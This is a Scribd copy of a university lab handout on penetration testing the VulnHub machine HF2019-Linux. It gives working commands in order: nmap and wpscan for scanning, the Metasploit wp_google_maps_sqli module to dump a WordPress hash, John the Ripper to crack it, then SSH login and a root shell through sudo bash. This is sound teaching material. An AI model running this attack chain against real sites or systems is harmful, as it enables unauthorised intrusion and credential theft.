Scribd
Upload
58 views

Lab 5 Privilage Exploitation With Sudo

The document discusses exploiting a WordPress website vulnerability and then escalating privileges on the compromised system using sudo rights. It provides steps to conduct network scanning, service enumeration, exploit a SQL injection vulnerability in a WordPress plugin to obtain credentials, crack passwords, and access the system via SSH. It then shows how to use sudo privileges to obtain root access and find a flag file.

Uploaded by

md5fxz9ths
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
58 views

Lab 5 Privilage Exploitation With Sudo

The document discusses exploiting a WordPress website vulnerability and then escalating privileges on the compromised system using sudo rights. It provides steps to conduct network scanning, service enumeration, exploit a SQL injection vulnerability in a WordPress plugin to obtain credentials, crack passwords, and access the system via SSH. It then shows how to use sudo privileges to obtain root access and find a flag file.

Uploaded by

md5fxz9ths
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 4

Lab 5: Privilege Escalation with Sudo

In this lab we will exploit a vulnerability in a WordPress website, and then once we got into the
machine, we will do privilege escalation with sudo.
The vulnerable machine:
https://download.vulnhub.com/hackerfest/HF2019-Linux.ova

Penetration Testing Methodology

• Network Scanning
• Nmap port scan
• Enumeration
• Browsing HTTP Service
• Scanning WordPress (wpscan)
• Exploiting
• WordPress Google Maps Plugin SQL Injection
• Use ssh to gain access to victim machine
• Privilege Escalation
• Abusing Sudo Rights
Network Scanning
1- The teacher should give you the IP address of vulnerable machine. (also you can use
netdiscover command).
2- Do nmap (aggressive mode) >>make sure you use the correct IP address of the victim:
nmap -A 10.0.2.17

We learned from the scan that we have the port 80 open which is hosting Apache httpd
service, along with the ports 21 and 22 open.

Enumeration
3- Open the website on the browser:

Dr. Sarah Abu Ghazalah


4- This gave us a site that looks like a WordPress site, it’s time to perform a wpscan on
the target machine.
wpscan --url http://10.0.2.17/

5- If we move further down in the wpscan result, we find the WordPress google map
plugin. It is not updated. So, this could help us. Let’s try and exploit it.

WordPress Google maps Sqli Exploit


6- Let us search for this on Metasploit.
7- Open msfconsole
8- Type search wp-google-maps

Dr. Sarah Abu Ghazalah


This exploit works on a SQL injection vulnerability.
9- So let us use this exploit as follows:
msf5 > use auxiliary/admin/http/wp google_maps_sqli

msf5 auxiliary(admin/http/wp_google_maps_sqli) > set rhosts 10.0.2.17

msf5 auxiliary(admin/http/wp_google_maps_sqli) > exploit

So, we got the username >>webmaster and the hash of user webmaster as follows:
webmaster $P$Bsq0diLTcye6ASlofreys4GzRlRvSrl

10- Now we can copy the hash in a file and call it hash, then we can use John the Ripper
tool to crack the hash password.
john --wordlist=rockyou.txt hash

Hint: you must unzip the file rockyou from /usr/share/wordlists and extract the file in
/home/kali
Go to the zip file >>right lcik and Extract All>>>chose the destination as /home/kali
11- Now we have username and passwd : webmaster:kittykat1. Try these credentials on
ssh port.

Dr. Sarah Abu Ghazalah


Privilege Escalation
12- After successful login in the victim’s machine now executes below command to know
sudo rights for the current user.
sudo -l

Here it is shown that the user webmaster has ALL sudo privilege so we can then open through
sudo /bin/bash which gives us the root privilege.

13- Type sudo bash, then to make sure you are root, type id:

Ac�vity:
On this machine try to find flag file, open it and show the teacher the flag.

Dr. Sarah Abu Ghazalah

You might also like